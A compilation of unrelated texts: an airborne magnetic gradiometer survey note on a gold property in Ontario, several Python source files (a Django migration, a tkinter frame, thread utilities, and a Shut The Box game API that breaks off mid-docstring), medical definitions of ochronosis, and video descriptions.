The magnetic data collected from the HeliGrad gradiometer system are corrected for spikes and diurnal variations. No lag correction is needed for magnetic data, since the position of the platform or bird GPS receiver is used as the data coordinate. However, some special corrections pertinent to gradiometer systems only must be applied to the data collected from the HeliGrad.
Since the HeliGrad gradiometer system is mounted on a rigid frame, the sensors positions are fixed with respect to each other. Therefore, one can work with the gradient vectors directly. The corrections applied to the gradient vectors are for the tilts of the platform. Tilts can be decomposed into three cardinal components, i.e. pitch, roll and yaw. The definitions of pitch, roll and yaw are given and illustrated in Figure 2a.
One can calculate gradients from Total Magnetic Intensity (TMI) data collected using a single magnetometer by 1D FFT for in-line and vertical gradients and 2D FFT for cross-line gradient. Under normal circumstances, the calculated in-line and vertical gradients are fairly comparable to the measured ones, except for very active magnetic areas. However, for cross-line gradient, the calculated is much inferior to the measured (Figure 2b). In general, for magnetic gradients, one can say that the measured are always better.
The Opikeigen Lake Gold Property is jointly owned by SLAM and Beatrix Ventures Inc. It is situated 10 km northwest of Fort Hope, Ontario. The property is located within the Uchi Subprovince, Superior Province of the Canadian Shield (Figure 1c; Stott 2010). The Uchi Subprovince is a 600-kilometre long greenstone belt, extending from Ontario-Manitoba border to the Hudson Bay Lowlands, hosting the Pickle Lake and the very productive Red Lake gold camps (Technical Report, 2009). It is underlain by volcanic and sedimentary rocks. High grade gold mineralization is associated with quartz veins in sheared and altered mafic volcanics in contact with the sediments.
In the Opikeigen Lake area, the greenstone belt is composed of east trending, isoclinally folded sequence of metavolcanic and metasedimentary rocks, Figure 6. The sediments are overlain by a basal sequence of felsic volcaniclastics and an upper sequence of mafic flows with intervals of sediments including iron formation.
Contacts between the metavolcanics and metasediments and structural traps along faults or shear zones are places to search for gold deposits. The magnetic gradient data collected using the HeliGrad system can help to find those places.
The lithological contacts between the metavolcanics and metasediments, and zones of metavolcanics (Vf and Vm) and metasediments (Sm) are inferred from the Total Magnetic Intensity (TMI) data, in Figure 3a. Lithological contacts usually track the local maxima of magnetic gradients. Zones of metavolcanics possess moderate to strong magnetic values, while the zones of metasediments exhibit low, especially the background, magnetic values. Zones of Band Iron Formations (BIF) are outlined as well. BIF have very strong magnetic responses.
Lineaments and faults are inferred from the tilt derivatives (Salem, 2008) computed directly from the measured magnetic gradients, in Figure 3b. Clearly shown are the SW-NE faults or shears cutting across the east trending sequences of metavolcanics and metasediments. The prospective zones of gold deposits are places where the faults intersect with the contacts, Figure 3c. It is quite clear that most of the interpreted gold prospective zones coincide with the known gold showing in the area.
The usefulness of the magnetic data in mineral exploration, as demonstrated in Opikeigen Gold project, is without question. The magnetic gradients data collected by HeliGrad tri-axial gradiometer system provide a sound geophysical basis for geological mapping and structural interpretations.
The helicopter-borne full Tri-axial magnetic gradiometer (HeliGrad) system provides measured and tilt corrected gradient data in in-line, cross-line and vertical directions. The magnetic gradients data collected by the HeliGrad system can be used in geological mapping and structural interpretations. Tilt-angle derivatives, which use all the measured gradients, are very useful in delineating lineaments and faults, as demonstrated in the Opikeigen Gold Project, SLAM Exploration Inc.
Figure 3: A) Lithologic units inferred from Total magnetic Intensity (TMI) data (B) Interpreted geology, lineaments & faults over derived magnetic tilt-angle derivative; C) Interpreted prospective zones from magnetics over known geology, featuring gold occurrences.
|
# Generated by Django 3.0.7 on 2020-08-04 22:04
from random import choices, randint
from string import ascii_letters, digits, punctuation
from django.contrib.auth.hashers import UNUSABLE_PASSWORD_PREFIX, make_password
from django.db import migrations
# Just want to highlight that we are distinguishing between these two.
ALLAUTH_ACCOUNT_APP = "account"
LOOKIT_ACCOUNTS_APP = "accounts"
def at_least_six(chars):
return choices(chars, k=randint(6, 12))
def generate_valid_password():
"""Generate a random password of at least 18 characters.
Ensures that we're alphanumeric + punctuated.
"""
return "".join(
at_least_six(ascii_letters) + at_least_six(digits) + at_least_six(punctuation)
)
def shim_usable_passwords(apps, schema_editor):
"""Create usable passwords for OSF-based users.
This will force them to do a password reset.
"""
UserModel = apps.get_model(LOOKIT_ACCOUNTS_APP, "User") # noqa
for user in UserModel.objects.filter(
password__startswith=UNUSABLE_PASSWORD_PREFIX, is_researcher=True
):
user.password = make_password(generate_valid_password())
user.save()
DELETE_ALLAUTH_SQL = """
-- Remove Django migrations
DELETE FROM django_migrations
WHERE app IN ('{allauth_account_app_name}', 'socialaccount');
-- Get rid of permissions.
DELETE FROM auth_permission
WHERE content_type_id in (
SELECT id FROM django_content_type
WHERE app_label IN ('{allauth_account_app_name}', 'socialaccount')
);
-- Get rid of admin changes.
DELETE FROM django_admin_log
WHERE content_type_id in (
SELECT id FROM django_content_type
WHERE app_label IN ('{allauth_account_app_name}', 'socialaccount')
);
-- Delete the content types.
DELETE FROM django_content_type
WHERE app_label IN ('{allauth_account_app_name}', 'socialaccount');
-- Drop tables
DROP TABLE IF EXISTS account_emailconfirmation CASCADE;
DROP TABLE IF EXISTS account_emailaddress;
DROP TABLE IF EXISTS socialaccount_socialtoken CASCADE;
DROP TABLE IF EXISTS socialaccount_socialapp_sites CASCADE;
DROP TABLE IF EXISTS socialaccount_socialapp CASCADE;
DROP TABLE IF EXISTS socialaccount_socialaccount;
""".format(
allauth_account_app_name=ALLAUTH_ACCOUNT_APP
)
class Migration(migrations.Migration):
dependencies = [
("admin", "0003_logentry_add_action_flag_choices"),
# If we don't add the above, tests will fail due to the fact that
# we use a custom default admin site.
# TODO: Investigate why and where Django's test harness fails to create
# these models, and then either file a bug or use a better fix.
("accounts", "0048_add_otp_model"),
]
operations = [
migrations.RunSQL(DELETE_ALLAUTH_SQL),
migrations.RunPython(shim_usable_passwords),
]
|
Nexus are a single source agency. We take care of everything so you don’t have to.
From artwork to typography, great design is at the core of everything we do.
Creative digital services, app development & web projects.
Beautifully crafted print for every purpose and specification, including merchandise.
Banner and exhibition stand solutions for all your event needs.
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
tkGAME - all-in-one Game library for Tkinter
Copyright (c) 2014+ Raphaël Seban <motus@laposte.net>
This program is free software: you can redistribute it and/or
modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of
the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program.
If not, see http://www.gnu.org/licenses/
"""
# lib imports
from tkinter import ttk
class GameFrame (ttk.Frame):
r"""
Generic game frame component;
"""
def __init__ (self, master=None, **kw):
# super class inits
ttk.Frame.__init__(self, master)
self.configure(**self._only_tk(kw))
# member inits
self.tk_owner = master
# set widget contents
self.init_widget(**kw)
# end def
def _only_tk (self, kw):
r"""
protected method def;
filters external keywords to suit tkinter init options;
returns filtered dict() of keywords;
"""
# inits
_dict = dict()
# $ 2014-02-24 RS $
# Caution:
# TK widget *MUST* be init'ed before calling _only_tk() /!\
# self.configure() needs self.tk to work well
if hasattr(self, "tk") and hasattr(self, "configure"):
_attrs = set(self.configure().keys()) & set(kw.keys())
for _key in _attrs:
_dict[_key] = kw.get(_key)
# end for
# end if
return _dict
# end def
def init_widget (self, **kw):
r"""
this should be overridden in subclass;
"""
# put here your own code in subclass
pass
# end def
# end class GameFrame
|
a peculiar discoloration of body tissues caused by deposit of alkapton bodies as the result of a metabolic disorder.
ocular ochronosis brown or gray discoloration of the sclera, sometimes involving also the conjunctivae and eyelids.
A rare, autosomal recessive disease characterized by alkaptonuria with pigmentation of the cartilages and sometimes tissues such as muscle, epithelial cells, and dense connective tissue; may affect also the sclera, mucous membrane of the lips, and skin of the ears, face, and hands, and cause standing urine to be dark colored and contain pigmented casts; pigmentation is thought to result from oxidized homogentisic acid, and cartilage degeneration results in osteoarthritis, particularly of the spine.
an inherited error of protein metabolism characterized by an accumulation of homogentisic acid, resulting in degenerative arthritis and brown-black pigment deposited in connective tissue and cartilage. It is often caused by alkaptonuria or poisoning with phenol. Bluish macules may be noted on the sclera, fingers, ears, nose, genitalia, buccal mucosa, and axillae. Urine color may be dark. See also alkaptonuria.
A condition observed in people with alkaptonuria, characterized by pigmentation of the cartilages; also may affect the sclerae, mucous membrane of the lips, and skin of the ears, face, and hands and may cause standing urine to be dark and contain pigmented casts; pigmentation results from oxidized homogentisic acid; cartilage degeneration results in osteoarthritis.
Persistent joint disease associated with blue or brownish discoloration of the joint cartilages occurring in patients with ALKAPTONURIA.
People with this rare hereditary condition tend to develop arthritis in adulthood.
n condition marked by accumulation of black-brown pigment in cartilage, joint capsules, and other connective tissues as a result of alkaptonuria, which is a metabolic disorder resulting in accumulation of homogentisic acid. See also alkaptonuria.
a yellow, brown or chocolate discoloration of cartilage, tendon sheaths and ligaments but not bone. Caused by deposit of alkapton bodies as the result of a metabolic disorder. Affected parts must be condemned as not suitable for human consumption.
brown or gray discoloration of the sclera, sometimes involving also the conjunctivae and eyelids.
|
# Copyright 2016 VMware, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Implements threading utilities
Written by Bruno Moura <brunotm@gmail.com>
"""
import threading
import logging
from weakref import WeakValueDictionary
class LockManager(object):
"""
Thread safe lock manager class
"""
def __init__(self):
self._lock = get_lock()
self._lock_store = WeakValueDictionary()
def get_lock(self, lockname, reentrant=False):
"""
Create or return a existing lock identified by lockname.
"""
with self._lock:
try:
lock = self._lock_store[lockname]
# logging.debug("LockManager.get_lock: existing lock: %s, %s",
# lockname, lock)
except KeyError:
lock = get_lock(reentrant)
self._lock_store[lockname] = lock
# logging.debug("LockManager.get_lock: new lock: %s, %s",
# lockname, lock)
# logging.debug("LockManager existing locks in store: %s",
# self._list_locks())
return lock
def _list_locks(self):
return self._lock_store.keys()
def list_locks(self):
"""
Return a list of existing lock names in lock store.
"""
with self._lock:
return self._list_locks()
def get_lock_decorator(reentrant=False):
"""
Create a locking decorator to be used in modules
"""
# Lock to be used in the decorator
lock = get_lock(reentrant)
def lock_decorator(func):
"""
Locking decorator
"""
def protected(*args, **kwargs):
"""
Locking wrapper
"""
# Get lock memory address for debugging
lockaddr = hex(id(lock))
# logging.debug("Trying to acquire lock: %s @ %s, caller: %s, args: %s %s",
# lock, lockaddr, func.__name__, args, kwargs)
with lock:
# logging.debug("Acquired lock: %s @ %s, caller: %s, args: %s %s",
# lock, lockaddr, func.__name__, args, kwargs)
return func(*args, **kwargs)
return protected
return lock_decorator
def start_new_thread(target, args=None, daemon=False):
"""Start a new thread"""
new_thread = None
if args:
new_thread = threading.Thread(target=target, args=args)
else:
new_thread = threading.Thread(target=target)
if daemon:
new_thread.daemon = True
new_thread.start()
logging.info("Started new thread : %s with target %s and args %s",
new_thread.ident, target, args)
logging.debug("Currently active threads: %s",
get_active_threads())
def get_active_threads():
"""Return the list of active thread objects"""
return threading.enumerate()
def get_local_storage():
"""Return a thread local storage object"""
return threading.local()
def set_thread_name(name):
"""Set the current thread name"""
threading.current_thread().name = name
def get_thread_name():
"""Get the current thread name"""
return threading.current_thread().name
def get_lock(reentrant=False):
"""Return a unmanaged thread Lock or Rlock"""
if reentrant:
return threading.RLock()
else:
return threading.Lock()
|
Kana Mutti - Wasthi ProductionsWasthi Productions "වස්ති"
Uploaded By Ganga Video Team.To view more new live shows, Please Subscribe Our "Ganga Video Team" YouTube Channel... ගංගා වීඩියෝ ටීම් වීඩියෝගත කල ප්රසංග ඉතා පැහැදිලි HD තාක්ෂණයෙන් අපගේ Ganga Video Team චැනලය ඔස්සේ නරඹන්න... අලුත්ම සංගීත ප්රසංග නැරඹීම සඳහා අපගේ YouTube චැනලය Subscribe කරන්න.
https://lrnews.ch/ https://www.facebook.com/lrnews.ch/ Im D.M. Thushara Jayarathna and studied at Ananda Sastralaya, Kotte. Im working as an Investigative Web Journalist For my higher studies, I joined with Sabaragamuwa University, Management Faculty as a management student and after that I joined to Sri Lanka Law College as a Law student. I have won the Gold medal addressing Juri competition and as well as I was the Captain of Law College Debating Team. I'm the one who made complain against Mr. Namal Rajapaksha, son of former president Mr. Mahinda Rajapaksha regarding cheating the Law College Examination. After that incident, I faced political problems and life threats. Due to this reason, In the year of 2012 I left my country and currently I'm living in Switzealand. I dedicated my life to establish Democracy and Rule of Law of my country.
මෙම විඩියෝව තුළින් කිසිදු පුද්ගයෙකුට දේශපාලන පක්ෂයකට හෝ කිසිම කණ්ඩායමකට සහය පලකිරීමට හෝ අපහාසක් කිරීමට අප බලාපොරොත්තු නොවන අතර හුදෙක් විනෝදය සදහා ක්රිකට් වලට ආදරය කරන ශ්රී ලාංකීකයන් වර්තමාන ක්රිකට් දකින විදිය පමණක් පෙන්වීමට කරනු ලබන නිර්මාණය ක් පමණි .. ස්තුතියි ..
Nirasha | Episode 95 Watch ITN Programmes & More Updates at http://www.itntv.lk #ITN #ITNSriLanka #Nirasha #Episode95 ITN ON SOCIAL Follow on Facebook : https://www.facebook.com/ITNSriLanka Follow on Twitter : https://www.twitter.com/ITNSriLanka Subscribe on YouTube: http://bit.ly/SubscribeITNSriLanka © 2018 by Independent Television Network. All rights reserved. No part of this video may be reproduced or transmitted in any form or by any means, electronic, mechanical, recording, or otherwise, without prior written permission of Independent Television Network.
#MounaRaagam #VijayTV #VijayTelevision #StarVijayTV #StarVijay #TamilTV #RedefiningEntertainment #Sakthi #SakthiVelan மௌன ராகம் | திங்கள் முதல் சனிக்கிழமை வரை இரவு 7:30 மணிக்கு உங்கள் விஜயில்.. Click here http://www.hotstar.com/tv/mouna-raagam/13874 to watch the show on hotstar.
|
"""main.py - This file creates and configures the Google Cloud Endpoints
for the ShutTheBox game, and contains part of the game logic and statistical
methods."""
import endpoints
from protorpc import remote, messages, message_types
from google.appengine.ext import ndb
from google.appengine.api import memcache
import logging
from models import User, Game, Turn
# Forms for doing the CRUD on the database
from models import CreateUserRequestForm, CreateUserResultForm
from models import EmailNotificationRequestForm, EmailNotificationResulForm
from models import NewGameRequestForm, NewGameResultForm
from models import TurnRequestForm, TurnResultForm
from models import CancelResultForm
# These next forms just read data
from models import FindGamesRequestForm, TotalFindGamesResultForm
from models import UserStatsRequestForm, UserStatsResultForm
from models import HighScoresRequestForm, TotalHighScoresResultForm
from models import LeaderboardRequestForm, UserLeaderboardResultForm, \
TotalLeaderboardResultForm
from models import AllTurnsReportResultForm
from utils import get_by_urlsafe
from collections import namedtuple
from operator import attrgetter
import pickle
# # ONLY UNCOMMENT/IMPORT THE MODULES BELOW IF USING THE test_method
# from models import InsertOrDeleteDataRequestForm, InsertOrDeleteDataResultForm
# INSERT_OR_DELETE_REQUEST = endpoints.ResourceContainer(
# InsertOrDeleteDataRequestForm)
# import json
# import requests as outside_requests
# import random
CREATE_USER_REQUEST = endpoints.ResourceContainer(CreateUserRequestForm)
EMAIL_NOTIFICATION_REQUEST = endpoints.ResourceContainer(
EmailNotificationRequestForm)
NEW_GAME_REQUEST = endpoints.ResourceContainer(NewGameRequestForm)
# Adding urlsafe_key like this makes it a required parameter and passes it as
# a path parameter in the URL
TURN_REQUEST = endpoints.ResourceContainer(TurnRequestForm,
urlsafe_key=messages.StringField(1))
URLSAFE_KEY_REQUEST = endpoints.ResourceContainer(
urlsafe_key=messages.StringField(1))
FIND_GAMES_REQUEST = endpoints.ResourceContainer(FindGamesRequestForm)
USER_STATS_REQUEST = endpoints.ResourceContainer(UserStatsRequestForm)
HIGH_SCORES_REQUEST = endpoints.ResourceContainer(HighScoresRequestForm)
LEADERBOARD_REQUEST = endpoints.ResourceContainer(LeaderboardRequestForm)
@endpoints.api(name='shut_the_box', version='v1')
class ShutTheBoxApi(remote.Service):
"""A set of methods implementing the gameplay of the classic British pub
game Shut The Box. The entire game is implemented on the server-side
through Google's Cloud Endpoints. The state of a game is remembered by
passing an individual game's entity key to the client, serving as a state
token."""
# First 4 APIs are functional and actually do things
@endpoints.method(request_message=CREATE_USER_REQUEST,
response_message=CreateUserResultForm,
path='create_user',
name='create_user',
http_method='POST')
def create_user(self, request):
"""Creates a User.
:param username (req): A unique username without leading spaces.
:type username: string
:param email (opt): A unique and valid email. Email is validated using
MAILGUN email validation API.
:type email: string
:param email_notification (opt): True by default. If True, user will
receive email notifications of outstanding active games.
:type email_notification: boolean
:returns message: A message confirming user was created, or an error
message.
:rtype message: string
:raises: ConflictException"""
# Some format checking
if not request.username:
raise endpoints.ConflictException(
'User name cannot be null')
if len(request.username) != len(request.username.lstrip(' ')):
raise endpoints.ConflictException(
'User name can not have leading spaces')
if request.username.isspace():
raise endpoints.ConflictException(
'User name cannot be null')
# Checking for duplicate entries
if User.query(User.username == request.username).get():
raise endpoints.ConflictException(
'A user with the name {} already exists!'.
format(request.username))
# Only check if email is valid if there is an email to check
if request.email:
if User.query(User.email == request.email).get():
raise endpoints.ConflictException(
'A user with the email {} already exists!'.
format(request.email))
# Checking if the email is valid via MAILGUN APIs
if not User.is_email_valid(request.email):
return CreateUserResultForm(
message="Email address invalid! User is not created.")
# All is good, saving User object
user = User(
username=request.username,
email=request.email,
email_notification=request.email_notification)
user.put()
else:
user = User(username=request.username)
user.put()
return CreateUserResultForm(message='User {} created!'.
format(request.username))
@endpoints.method(request_message=EMAIL_NOTIFICATION_REQUEST,
response_message=EmailNotificationResulForm,
path='email_notification',
name='email_notification',
http_method='POST')
def set_email_notification_preference(self, request):
"""Allows a user to change their email notification preference.
:param username (req): A unique username without leading spaces.
:type username: string
:param email_notification (req): If True, user will receive email
notifications of outstanding active games that haven't been played in
the last 12 hours. If False, users will stop receiving these
notifications.
:type email_notifications: boolean
:returns message: A message confirming email notification preference,
or an error.
:rtype message: string"""
user = User.query(User.username == request.username).get()
if not user:
raise endpoints.NotFoundException(
'A user with the name {} does not exist!'.\
format(request.username))
user.email_notification = request.email_notification
user.put()
return EmailNotificationResulForm(message="Email notification"\
"preferences set to {}".format(request.email_notification))
@endpoints.method(request_message=NEW_GAME_REQUEST,
response_message=NewGameResultForm,
path='new_game',
name='new_game',
http_method='POST')
def new_game(self, request):
"""Creates a new game and returns the game's urlsafe key.
:param username (req): A unique username.
:type username: string
:param number_of_tiles (req): Number of tiles to play Shut The Box with.
:type number_of_tiles: enum-{NINE, TWELVE}
:param dice_operation (req): When two dice are rolled in a turn,
this determines if the number to aim for with the flipped tiles is the
sum of the dice roll or the product.
:type dice_operation: enum-{ADDITION, MULTIPLICATION}
:returns username: User's username.
:rtype username: string
:returns number_of_tiles: Number of tiles to play Shut The Box with.
:rtype number_of_tiles: enum-{NINE, TWELVE}
:returns dice_operation: When two dice are rolled in a turn,
this determines if the number to aim for with the flipped tiles is the
sum of the dice roll or the product.
:rtype dice_operation: enum-{ADDITION, MULTIPLICATION}
:returns urlsafe_key: This serves as the state token for a game of Shut
The Box.
:rtype urlsafe-key: string
:returns message: A helpful message or an error message.
:rtype message: string
:raises: NotFoundException, ConflictException"""
user = User.query(User.username == request.username).get()
if not user:
raise endpoints.NotFoundException(
'A user with the name {} does not exist!'.\
format(request.username))
if not request.number_of_tiles or not request.dice_operation:
raise endpoints.ConflictException(
'User must specify the number of tiles and the dice operation')
game = Game.new_game(user.key, request.number_of_tiles.number,
request.dice_operation.name)
return game.to_new_game_result_form("Good luck playing Shut The"\
"Box,{}!".format(user.username))
@endpoints.method(request_message=TURN_REQUEST,
response_message=TurnResultForm,
path='game/{urlsafe_key}',
name='turn',
http_method='PUT')
def turn(self, request):
"""Plays one turn of Shut The Box.
To play Shut The Box, first call turn() with only a urlsafe_key and flip
tiles null. It returns a roll and a full set of tiles.
Each subsequent call of turn() must include both a urlsafe_key and
flip_tiles, and turn() will determine the validity of flip_tiles and
compute the next roll. The goal is to flip all the tiles and get the
lowest score possible.
:param urlsafe_key (req): The state token for a game of Shut The Box.
:type urlsafe_key: string
:param flip_tiles (opt): Leave this parameter null for the first call of
turn(). On subsequent calls, flip_tiles are the integers to be
flipped in response to the roll.
:type flip_tiles: list of non-negative integers
:returns urlsafe_key: The same urlsafe_key passed in.
:rtype urlsafe_key: string
:returns roll: A list of two integers, each between 1-6, if there are
active tiles above 7 in play. If all tiles above 7 are inactive only
one integer is returned.
:rtype roll: list of non-negative integers
:returns active_tiles: The newly computed active_tiles left after the
roll has been played.
:rtype active_tiles: A list of non-negative integers
:returns valid_move: True if flip_tiles played are valid, False if they
are not valid.
:rtype valid_move: boolean
:returns score: A running score of the active_tiles in play.
:rtype score: non-negative integer
:returns game_over: If True, game is over.
:rtype game_over: boolean
:returns message: A helpful message or an error message.
:rtype message: string
:raises: BadRequestException, ValueError"""
# First make sure the game's key is real/not game over status
game = get_by_urlsafe(request.urlsafe_key, Game)
if game.game_over:
form = TurnResultForm()
form.urlsafe_key = request.urlsafe_key
form.valid_move = False
form.game_over = True
form.message = "This game is already over. Play again by calling "\
"new_game()!"
return form
# If it's a real game, get the most recent turn
MEMCACHE_KEY = game.key.urlsafe()
recent_turn = game.most_recent_turn()
if not recent_turn:
# If recent_turn is null, this is the first roll!
turn = Turn.first_turn(game)
if not memcache.add(key=MEMCACHE_KEY, value=pickle.dumps(turn),
time=360):
logging.warning("Memcache addition failed!")
return turn.to_turn_result_form(
urlsafe_key=game.key.urlsafe(),
valid_move=True,
message="Call turn() again to play your roll")
# If it's not a user's first turn, user must pass in flip_tiles
if not request.flip_tiles:
return recent_turn.to_turn_result_form(
urlsafe_key=game.key.urlsafe(),
valid_move=False,
message="User must pass in values to flip_tiles!")
# Check if it's a valid flip
error = recent_turn.invalid_flip(request.flip_tiles,
game.dice_operation)
if error:
return recent_turn.to_turn_result_form(
urlsafe_key=game.key.urlsafe(),
valid_move=False,
message=error)
# Since it's a valid flip, end the last turn
recent_turn.end_turn()
# Create a new turn
new_turn = recent_turn.new_turn(game, request.flip_tiles)
# If the new turn does not have any active tiles, it's a perfect score
# and the game's over
if not new_turn.active_tiles:
new_turn.end_game(game)
return new_turn.to_turn_result_form(
urlsafe_key=game.key.urlsafe(),
valid_move=True,
message="Game over! Perfect score! Call new_game() to play again!")
# Check if the roll from the new turn ends the game
game_over = new_turn.is_game_over(game)
if game_over:
new_turn.end_game(game)
return new_turn.to_turn_result_form(
urlsafe_key=game.key.urlsafe(),
valid_move=True,
message="Game over! Call new_game() to play again!")
# If the code's fallen through to here, the roll is valid. Add newest turn to memcache
if not memcache.replace(key=MEMCACHE_KEY, value=pickle.dumps(new_turn),
time=360):
logging.warning("Memcache logging failed!")
return new_turn.to_turn_result_form(
urlsafe_key=game.key.urlsafe(),
valid_move=True,
message="Call turn() again to play your roll")
@endpoints.method(request_message=URLSAFE_KEY_REQUEST,
response_message=CancelResultForm,
path='cancel_game/{urlsafe_key}',
name='cancel_game',
http_method='DELETE')
def cancel_game(self, request):
"""Cancels a Game entity and its children Turn entities. User can
only cancel games in progress. This API operates under the assumpion
that it's better to just cancel games outright instead of somehow
marking them as deleted in the database.
:param urlsafe_key (req): The state token for a game of Shut The Box.
:type urlsafe_key: string
:returns cancelled: True if the game entity and Turn entities are
deleted from the datastore; False if the game entity in question is
completed.
:rtype cancelled: boolean
:returns error: Helpful error message.
:rtype error: string
:raises: BadRequestException, ValueError"""
game = get_by_urlsafe(request.urlsafe_key, Game)
if game.game_over:
return CancelResultForm(
cancelled=False,
error="Can't cancel games that are already completed.")
# This deletes both the parent game and the children turns
ndb.delete_multi(ndb.Query(ancestor=game.key).iter(keys_only=True))
return CancelResultForm(cancelled=True)
# The next APIs are statistics, game state information, and leaderboards
# They don't create, update, or delete the database, they just read from
# it
# The rubric calls for a method get_user_games, but I expanded this API to
# have that functionality and more
@endpoints.method(request_message=FIND_GAMES_REQUEST,
response_message=TotalFindGamesResultForm,
path='find_games',
name='find_games',
http_method='POST')
def find_games(self, request):
"""Searches for games matching the passed in search criteria and
returns basic information about them.
Will return an error if both games_in_progress and finished_games are
True.
:param games_in_progress (opt): False by default. If True, filters by
games in progress.
:type games_in_progress: boolean
:param finished_games (opt): False by default. If True, filters by
finished games.
:type finished_games: boolean
:param number_of_tiles (opt): Filters games by number of tiles.
:type number_of_tiles: enum-{NINE, TWELVE}
:param dice_operation (opt): Filters games by dice operation.
:type dice_operation: enum-{ADDITION, MULTIPLICATION}
:param username (opt): Filters by username.
:type username: string
:returns games: A list of games. Each game is made up of the parameters
below.
:rtype games: list
:returns urlsafe_key: The state token for this game of Shut The Box.
:rtype urlsafe_key: string
:returns number_of_tiles: Number of tiles for this game.
:rtype number_of_tiles: enum-{NINE, TWELVE}
:returns dice_operation: Dice operation for this game.
:rtype dice_operation: enum-{ADDITION, MULTIPLICATION}
:returns game_over: If True, this game is over.
:rtype game_over: boolean
:returns turns_played: Number of turns played for this game.
:rtype turns_played: integer
:raises: NotFoundException, BadRequestException"""
# if username is passed in, look for only their games
if request.username:
user = User.query(User.username == request.username).get()
if not user:
raise endpoints.NotFoundException(
'A user with the name {} does not exist!'.\
format(request.username))
games_query = Game.query(ancestor=user.key)
else:
games_query = Game.query()
if request.games_in_progress == True \
and request.finished_games == True:
raise endpoints.BadRequestException("games_report can't be called "
"with both parameters games_in_progress and finished_games "
"True")
if request.games_in_progress:
games_query = games_query.filter(Game.game_over == False)
if request.finished_games:
games_query = games_query.filter(Game.game_over == True)
if request.number_of_tiles:
games_query = games_query.filter(
Game.number_of_tiles == request.number_of_tiles.number)
if request.dice_operation:
games_query = games_query.filter(
Game.dice_operation == request.dice_operation.name)
# Return the most recent games first
games_query = games_query.order(-Game.timestamp)
games = games_query.fetch()
return TotalFindGamesResultForm(
games=[game.to_find_games_result_form() for game in games])
@endpoints.method(request_message=USER_STATS_REQUEST,
response_message=UserStatsResultForm,
path='user_stats',
name='user_stats',
http_method='POST')
def get_user_stats(self, request):
"""Returns user statistics for a particular user.
The statistics are completed games, total score, total turns, average
score, and average turns. Able to filter by dice operation and number
of dice.
:param username (req): A unique username.
:type username: string
:param number_of_tiles (opt): If specified, filters to return games
with the specified number_of_tiles.
:type number_of_tiles: enum-{NINE, TWELVE}
:param dice_operation (opt): If specified, filters to return games
with the specified dice_operation.
:type dice_operation: enum-{ADDITION, MULTIPLICATION}
:returns games_completed: Number of games completed.
:rtype games_completed: integer
:returns total_score: Total score of completed games.
:rtype total_score: integer
:returns total_turns: Total number of turns for completed games.
:returns average_score: Average score from completed games, rounded
to 3 decimal places.
:rtype average_score: float
:returns average_turns: Average turns fromcompleted games, rounded
to 3 decimal places.
:rtype average_turns: float
:returns message: Helpful error message.
:rtype message: string
:raises: NotFoundException"""
# TODO: For the life of me, I could not figure out how to make this
# method into a GET request with multiple query parameters (username,
# number_of_dice, dice_operation). I was able to figure out how to
# do it with one parameter, but not multiple. And the google
# tutorial only features GETs with 1 parameter.
# https://github.com/GoogleCloudPlatform/python-docs-samples/blob
# /master/appengine/standard/endpoints/backend/main.py
user = User.query(User.username == request.username).get()
if not user:
raise endpoints.NotFoundException(
'A user with the name {} does not exist!'.\
format(request.username))
games_query = Game.query(ancestor=user.key)
# Only return games that have a status of game_over
games_query = games_query.filter(Game.game_over == True)
# Optional filters
if request.number_of_tiles:
games_query = games_query.filter(
Game.number_of_tiles == request.number_of_tiles.number)
if request.dice_operation:
games_query = games_query.filter(
Game.dice_operation == request.dice_operation.name)
games = games_query.fetch()
if not games:
return UserStatsResultForm(message="No games found!")
(games_completed, total_score, total_turns,
average_score, average_turns) = Game.games_stats(games)
form = UserStatsResultForm(
games_completed=games_completed,
total_score=total_score,
total_turns=total_turns,
average_score=average_score,
average_turns=average_turns)
return form
@endpoints.method(request_message=HIGH_SCORES_REQUEST,
response_message=TotalHighScoresResultForm,
path='high_scores',
name='high_scores',
http_method='POST')
def get_high_scores(self, request):
"""Returns a list of high scores. In Shut The Box, lower scores are
better, so a list of high scores is a list of the scores from lowest to
highest. In the case of a tie, order is determined by which game
finished first.
The high scores are able to be filtered by dice_operation or
number_of_tiles.
:param number_of_tiles (opt): If specified, filters to
return games with the specified number_of_tiles.
:type number_of_tiles: enum-{NINE, TWELVE}
:param dice_operation (opt): If specified, filters to
return games with the specified dice_operation.
:type dice_operation: enum-{ADDITION, MULTIPLICATION}
:param number_of_results (opt): Number of high scores to return
:type number_of_results: integer. DEFAULT=20
:returns high_scores: List of games ordered by high scores. Each game
contains the parameters below.
:rtype high_score: list
:returns score: The final score.
:rtype score: integer
:returns username: The user who played this game.
:rtype username: string
:returns number_of_tiles: Number of tiles for this game.
Shut The Box with.
:rtype number_of_tiles: enum-{NINE, TWELVE}
:returns dice_operation: Dice operation for this game.
:rtype dice_operation: enum-{ADDITION, MULTIPLICATION}
:returns timestamp: The date and time when the game was completed.
:rtype timestamp:
:returns message: Helpful error message
:rtype message: string
:raises: BadArgumentError"""
if request.number_of_results < 0:
return TotalHighScoresResultForm(message="number_of_results must "\
"not be below 0!")
# Order by the most recent lowest score
games_query = Game.query()
games_query = games_query.filter(Game.game_over == True)
if request.number_of_tiles:
games_query = games_query.filter(
Game.number_of_tiles == request.number_of_tiles.number)
if request.dice_operation:
games_query = games_query.filter(
Game.dice_operation == request.dice_operation.name)
games_query = games_query.order(Game.final_score, -Game.timestamp)
games = games_query.fetch(limit=request.number_of_results)
if not games:
return TotalHighScoresResultForm(message="No games match criteria!")
return TotalHighScoresResultForm(
high_scores=[game.to_high_scores_result_form() for game in games])
@endpoints.method(request_message=LEADERBOARD_REQUEST,
response_message=TotalLeaderboardResultForm,
path='leaderboard',
name='leaderboard',
http_method='POST')
def get_leaderboard(self, request):
"""List of ranked users. Users are ranked by average_score from low
to high, and in the case of a tie in average score, the rank is
determined by lowest average_turns.
